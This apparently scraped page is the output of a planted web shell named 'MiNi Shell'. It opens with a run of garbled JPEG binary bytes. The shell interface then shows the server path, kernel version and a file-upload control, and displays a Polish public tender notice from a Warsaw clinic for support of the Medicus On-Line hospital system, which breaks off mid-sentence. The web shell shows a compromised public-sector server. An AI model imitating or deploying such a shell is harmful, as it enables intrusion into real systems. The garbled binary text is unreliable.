JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240603/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240603/0034913501-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> ZP-2511-11-IS/2024 - „Usługa świadczenia wsparcia technicznego systemu informatycznego klasy HIS – Medicus On-Line”, </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Samodzielny Zespół Publicznych Zakładów Lecznictwa Otwartego Warszawa-Ochota</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 010202670</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Szczęśliwicka 36</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">02-353</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">ZAMOWIENIA@SZPZLO-OCHOTA.PL</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.szpzlo-ochota.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - samodzielny publiczny zakład opieki zdrowotnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> ZP-2511-11-IS/2024 - „Usługa świadczenia wsparcia technicznego systemu informatycznego klasy HIS – Medicus On-Line”, </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-9986b6f2-21b3-11ef-a500-1a0072d5d2bd</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00349135</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-06-03</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00041802/06/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.2 Usługa świadczenia wsparcia technicznego systemu informatycznego klasy HIS – Mmedicus On-Line</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/transakcja/935320 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Niniejsze Postępowanie jest prowadzone w postaci elektronicznej.<br/>na platformazakupowa.pl pod adresem:<br/>https://platformazakupowa.pl/transakcja/935320</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Oferta, wniosek oraz przedmiotowe<br/>środki dowodowe (jeżeli były wymagane), składane elektronicznie, muszą zostać podpisane elektronicznym kwalifikowanym<br/>podpisem lub podpisem zaufanym lub podpisem osobistym. W procesie składania oferty, wniosku w tym przedmiotowych środków dowodowych na platformie, kwalifikowany podpis elektroniczny, podpis zaufany albo podpis osobisty, Wykonawca może złożyć bezpośrednio na dokumencie, który następnie przesyła do systemu (opcja rekomendowana przez platformazakupowa.pl) oraz dodatkowo dla całego pakietu dokumentów w kroku 2 Formularza składania oferty lub wniosku (po kliknięciu w przycisk Przejdź do podsumowania).<br/>2. Poświadczenia za zgodność z oryginałem dokonuje odpowiednio Wykonawca, podmiot, na którego zdolnościach lub sytuacji<br/>polega Wykonawca, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego albo podwykonawca, w zakresie dokumentów, które każdego z nich dotyczą. Poprzez oryginał należy rozumieć dokument podpisany kwalifikowanym podpisem elektronicznym lub podpisem zaufanym, lub podpisem osobistym przez osobę/osoby upoważnioną/upoważnione. Poświadczenie za zgodność z oryginałem następuje w formie elektronicznej podpisane kwalifikowanym podpisem elektronicznym lub podpisem zaufanym, lub podpisem osobistym przez osobę/osoby upoważnioną/upoważnione.<br/>3. Oferta powinna być:<br/>a) sporządzona na podstawie Załączników do niniejszej SWZ w języku polskim,<br/>b) złożona przy użyciu środków komunikacji elektronicznej tzn. za pośrednictwem platformazakupowa.pl, na stronie internetowej<br/>prowadzonego postępowania pod adresem<br/>https://platformazakupowa.pl/transakcja/935320 <br/>c) podpisana kwalifikowanym podpisem elektronicznym lub podpisem zaufanym, lub podpisem osobistym przez osobę/osoby<br/>upoważnioną/upoważnione.<br/>4. Podpisy kwalifikowane, wykorzystywane przez Wykonawców do podpisywania wszelkich plików muszą spełniać “RozporządzenieParlamentu Europejskiego i Rady w sprawie identyfikacji elektronicznej i usług zaufania w odniesieniu do transakcji elektronicznych<br/>na rynku wewnętrznym (eIDAS) (UE) nr 910/2014 - od 1 lipca 2016 roku”.<br/>5. W przypadku wykorzystania formatu podpisu XAdES zewnętrzny, Zamawiający wymaga dołączenia odpowiedniej ilości plików tj. podpisywanych plików z danymi oraz plików XAdES.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Administratorem Pani/Pana danych osobowych jest Samodzielny Zespół Publicznych<br/>Zakładów Lecznictwa Otwartego Warszawa–Ochota (dalej jako SZPZLO) z siedzibą<br/>w Warszawie 02–353, przy ul. Szczęśliwickiej 36, adres e-mail: sekretariat@szpzlo-ochota.pl.<br/>2. Kontakt z inspektorem ochrony danych SZPZLO jest możliwy pod adresem:<br/>a. - SZPZLO Warszawa – Ochota, ul. Szczęśliwicka 36, 02 – 353 Warszawa<br/>b. - e-mail: iod@szpzlo-ochota.pl<br/>3. Dane osobowe będą przetwarzane na podstawie art. 6 ust. 1 lit. c rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie<br/>o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1, z późn. zm.) (dalej: RODO) w celu związanym z postępowaniem o<br/>udzielenie zamówienia publicznego. Podstawą prawną ich przetwarzania są przepisy ustawy z dnia 11 września 2019 r. Prawo<br/>zamówień publicznych (Dz. U. z 2023 r., poz. 1605, z późn. zm.), w dalszej treści zwana „Ustawą”, a także ustawa<br/>z dnia 14 lipca 1983 r. o narodowym zasobie archiwalnym i archiwach (t.j. Dz. U. z 2020 r., poz. 164).<br/>4. Odbiorcami danych będą podmioty uprawnione na podstawie przepisów prawa do ich otrzymania oraz podmioty świadczące<br/>SZPZLO usługi w zakresie IT.<br/>5. Dane osobowe będą przechowywane, zgodnie z art. 78 Ustawy, przez okres 4 (czterech) lat<br/>od dnia zakończenia postępowania o udzielenie zamówienia. Jeżeli okres obowiązywania umowy w sprawie zamówienia<br/>publicznego przekracza 4 (cztery) lata, Zamawiający przechowuje protokół postępowania wraz z załącznikami przez cały okres<br/>obowiązywania umowy w sprawie zamówienia publicznego.<br/>6. Ma Pani/Pan:<br/>- prawo dostępu do swoich danych oraz otrzymania ich kopii<br/>- prawo do sprostowania swoich danych;<br/>- prawo do ograniczenia przetwarzania danych<br/>7. Ma Pan/Pani prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych.<br/>8. Obowiązek podania przez Panią/Pana danych osobowych jest wymogiem ustawowym określonym w przepisach ustawy Prawo<br/>zamówień publicznych, związanym z udziałem<br/>w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Prawo<br/>zamówień publicznych.<br/>9. Pani/Pana dane nie będą podlegać zautomatyzowanemu podejmowaniu decyzji, w tym profilowaniu.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">zgodnie z dokumentacją postępowania, w szczególności z umową powierzenia przetwarzania danych osobowych, której wzór stanowi załącznik nr 8 do projektu umowy, stanowiącego załącznik nr 3 do SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP-2511-11-IS/2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest usługa świadczenia wsparcia technicznego systemu informatycznego klasy HIS – Medicus On-Line.<br/>2.	Nazwa i kod dotyczący przedmiotu zamówienia określony we Wspólnym Słowniku Zamówień publicznych (CPV): usługi w zakresie konserwacji i wsparcia systemów – 72250000-2.<br/>3.	Opis przedmiotu zamówienia stanowi Załącznik nr 1 do niniejszej SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">72250000-2 - Usługi w zakresie konserwacji i wsparcia systemów</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> ROZDZIAŁ II SWZ - OPIS PRZEDMIOTU ZAMÓWIENIA; PRAWO OPCJI UST. 4.:<br/>Zamawiający w ramach przedmiotu umowy Zamawiający, uprawniony jest do skorzystania z prawa opcji na zasadach i trybie opisanym poniżej:<br/>1)	Zamawiający może z opisanego w SWZ prawa opcji, skorzystać lub skorzystać w części, gdy w okresie trwania umowy, w danym okresie rozliczeniowym, zostaną wykorzystane wszystkie 12 h (dwanaście) godzin, objętych zakresem podstawowym, i zwiększenie ich liczby w danym okresie rozliczeniowym, będzie leżała w interesie Zamawiającego oraz wynikała z jego bieżących potrzeb,<br/>2)	zamówienie realizowane w ramach prawa opcji, jest jednostronnym uprawnieniem Zamawiającego, dlatego też nieskorzystanie przez Zamawiającego z prawa opcji nie stanowi podstawy dla Wykonawcy do dochodzenia jakichkolwiek roszczeń w stosunku do Zamawiającego;<br/>3)	zamówienie objęte prawem opcji, Wykonawca będzie zobowiązany wykonać <br/>po uprzednim otrzymaniu zawiadomienia od Zamawiającego, że zamierza z prawa opcji skorzystać, w zakresie pakietu opieki serwisowej. Opis czynności, objętych pakietem opieki serwisowej, zawarty jest w Opisie przedmiotu zamówienia, stanowiącego Załącznik nr 1 do SWZ,<br/>4)	termin wykonania zamówienia objętego prawem opcji nie może być dłuższy niż 24 h (dwadzieścia cztery) godziny od przesłania zawiadomienia do Wykonawcy;<br/>5)	zasady dotyczące realizacji zamówienia, objętego prawem opcji, będą takie same, jak te, które obowiązują przy realizacji zamówienia podstawowego. Zamawiający zastrzega również, że cena jednostkowa za jedną godzinę opieki serwisowej, objętej opcją, będzie identyczna, jak w zamówieniu podstawowym oraz niezmienne w całym okresie realizacji umowy;<br/>6)	przedmiot umowy, w zakresie przysługującego Zamawiającemu prawa opcji obejmuje również prace konsultacyjno – serwisowe, w łącznie w ilości maksymalnie 100 h (stu godzin) w okresie realizacji zamówienia, w ramach przedmiotowego uprawnienia Zamawiającego;<br/>7)	Zamawiający zastrzega, że ilość godzin opieki serwisowej, przewidziana w ramach prawa opcji jest wielkością maksymalną, i może ulec zmniejszeniu w zależności od potrzeb Zamawiającego w trakcie trwania umowy;<br/>8)	Zamawiający jest uprawniony do skorzystania z prawa opcji w okresie trwania umowy.<br/>9)	Zamawiający ma prawo wielokrotnie korzystać z prawa opcji po zrealizowaniu zakresu podstawowego zamówienia – jednak do wyczerpania maksymalnego zakresu prawa opcji, o którym mowa w pkt 6) powyżej,<br/>10)	w celu uruchomienia prawa opcji, Zamawiający złoży Wykonawcy pisemne oświadczenie woli w przedmiocie skorzystania z prawa opcji, w określonym zakresie,<br/>11)	oświadczenie, o którym mowa w pkt 10) powyżej, będzie zawierało potwierdzenie środków finansowych na zrealizowanie zamówienia i będzie stanowiło załącznik <br/>do umowy,<br/>12)	uruchomienie opcji nie będzie wymagało zmiany umowy. <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">NA PODSTAWIE ART. 214 UST. 1 PKT 7 USTAWY PZP</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1)	w podkryt. pn. dostęp do nowych wersji Programu „S” – „A”,, o którym mowa w ust. 1 pkt 1) lit. a) powyżej, oferty oceniane będą na podstawie wartości brutto, podanej w Formularzu ofertowym, stanowiącym Załącznik nr 5 do SWZ. Największą ilość punktów tj. 25,00 pkt, otrzyma oferta z najniższą wartością brutto, pozostałe oferty oceniane będą zgodnie ze wzorem: <br/>najniższa wartość brutto za dostęp do nowych wersji Programu „S”<br/>A = ------------------------------------------------------------- x 100 x 25%<br/>wartość brutto za dostęp do nowych wersji Programu „S” oferty badanej<br/>2)	w podkryt. pn. świadczenia Opieki serwisowej – „B”,, o którym mowa w ust. 1 pkt 1) lit. b) powyżej, oferty oceniane będą na podstawie wartości brutto, podanej w Formularzu ofertowym, stanowiącym Załącznik nr 5 do SWZ. Największą ilość punktów tj. 25,00 pkt, otrzyma oferta z najniższą wartością brutto, pozostałe oferty oceniane będą zgodnie ze wzorem:<br/>najniższa wartość brutto za świadczenia Opieki serwisowej	<br/>B = --------------------------------------------------------------x 100 x 25%<br/>wartość brutto za świadczenia Opieki serwisowej oferty badanej<br/><br/>3)	w podkryt. pn. dostęp do funkcjonalności dedykowanej formularzy i modułów dla CZP-B – „C”, o którym mowa w ust. 1 pkt 1) lit. c) powyżej, oferty oceniane będą na podstawie wartości brutto, podanej w Formularzu ofertowym, stanowiącym Załącznik nr 5 do SWZ. Największą ilość punktów tj. 10,00 pkt, otrzyma oferta z najniższą wartością brutto, pozostałe oferty oceniane będą zgodnie ze wzorem:<br/>najniższa wartość brutto za dostęp do funkcjonalności dedykowanej formularzy i modułów dla CZP-B	<br/>C = ------------------------------------------------------------- x 100 x 10%<br/>wartość brutto za dostęp do funkcjonalności dedykowanej <br/>formularzy i modułów dla CZP-B oferty badanej<br/><br/>4)	Kryterium Czas naprawy „Cn” – 40%<br/>Sposób obliczenia wartości procentowej oferty w kryterium Czas reakcji „Cr”:<br/>punkty w tym kryterium przyznane zostaną na podstawie czasu reakcji dla błędu krytycznego, zaoferowanego przez Wykonawcę w Formularzu Ofertowym. Oferta Wykonawcy, który zaproponuje najkrótszy czas naprawy, tj. w przedziale 1 h - 5 h, otrzyma 40 pkt, pozostałym ofertom zostaną przydzielone punkty, zgodnie nw. punktacją:<br/>24 h i powyżej– 0 pkt;<br/>23 h – 18 h – 10 pkt;<br/>17 h – 12 h – 20 pkt;<br/>11 h – 6 h – 30 pkt;<br/>5 h – 1 h – 40 pkt.<br/>Zamawiający informuje, iż minimalny czas naprawy, nie może być krótszy niż 1 h (jedna godzina) i dłuższy niż 24 h (dwadzieścia cztery godziny). W przypadku zaoferowania czasów naprawy krótszego lub dłuższego, niż te, o których mowa w zdaniu poprzedzającym, oferta zostanie odrzucona na podstawie art. 226 ust. 1 pkt. 5 Ustawy, jako niezgodna z warunkami zamówienia. <br/>Oferta zostanie odrzucona również w przypadku, gdy Wykonawca, nieprecyzyjnie wskaże przedział czasowy, o którym mowa powyżej.<br/>1)	Końcową ilość punktów uzyskanych przez ofertę, stanowić będzie suma punktów uzyskanych w kryteriach Cena „C” oraz Czas naprawy „Cn”.<br/>2)	Cena ofertowa brutto musi uwzględniać wszelkie koszty jakie Wykonawca poniesie w związku z realizacją przedmiotu zamówienia.<br/>3)	W toku badania i oceny ofert Zamawiający może żądać od Wykonawcy wyjaśnień dotyczących treści złożonej oferty, w tym zaoferowanej ceny.<br/>4)	Każda Oferta może otrzymać maksymalnie 100 pkt.<br/>5)	Zamawiający udzieli zamówienia Wykonawcy, którego oferta:<br/>6)	odpowiada wszystkim wymaganiom przedstawionym w Ustawie,<br/>7)	odpowiada wszystkim wymaganiom przedstawionym w SWZ;<br/>8)	uzyskała najwyższą ilość punktów, zgodnie z kryterium oceny ofert.<br/>9)	W sytuacji, gdy Zamawiający nie będzie mógł dokonać wyboru najkorzystniejszej oferty ze względu na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, Zamawiający zastosuje procedurę określoną w art. 248 Ustawy.<br/>Szczegółowe zapisy znajdują się w rozdziale XIX ust. 3 SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">2) Czas naprawy w przypadku błędu krytycznego „Cn”</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> DOT. zdolności technicznej lub zawodowej:<br/>Wykonawca spełni warunek jeżeli wykaże, że w okresie ostatnich 3 (trzech) lat przed upływem terminu składania ofert – a jeżeli okres prowadzenia działalności przez Wykonawcę jest krótszy, w tym okresie – należycie wykonał co najmniej 1 (jedną) usługę, polegającą na wykonywaniu obsługi serwisowej systemu informatycznego Medicus, <br/>o wartości co najmniej 123 000,00 zł brutto (słownie brutto: sto dwadzieścia trzy tysiące złotych 00/100), według Załącznika nr 6 do SWZ. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Oświadczenie, zgodnie z Załącznikiem nr 4 do SWZ, w postaci elektronicznej opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym albo podpisem osobistym, obejmujący oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu, braku podstaw do wykluczenia - Załącznik nr 4 do SWZ.<br/>2 Oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 Ustawy, o braku przynależności do tej samej grupy kapitałowej w<br/>rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2023 r., poz. 1689), z innym<br/>Wykonawcą, który złożył odrębną ofertę, ofertę częściową, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz<br/>z dokumentami lub informacjami potwierdzającymi przygotowanie oferty lub oferty częściowej niezależnie od innego Wykonawcy<br/>należącego do tej samej grupy kapitałowej, stanowiące Załącznik 2 do SWZ<br/>3) odpis lub informacja z Krajowego Rejestru Sądowego albo z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w<br/>zakresie art. 109 ust. 1 pkt 4 Ustawy, sporządzonych nie wcześniej niż 3 (trzy) miesiące przed jej złożeniem, jeżeli odrębne przepisy<br/>wymagają wpisu do 